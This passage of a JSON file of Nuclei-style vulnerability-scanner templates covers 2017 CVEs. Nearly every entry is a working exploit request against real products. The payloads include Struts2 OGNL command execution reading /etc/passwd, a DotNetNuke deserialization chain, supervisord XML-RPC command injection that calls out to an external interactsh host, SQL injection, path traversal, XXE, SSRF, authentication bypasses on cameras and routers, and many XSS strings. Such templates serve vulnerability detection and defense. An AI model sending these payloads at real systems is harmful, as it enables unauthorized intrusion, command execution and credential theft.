5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18565","info":{"name":"Updater by BestWebSoft < 1.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/updater/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-18537","info":{"name":"Visitors 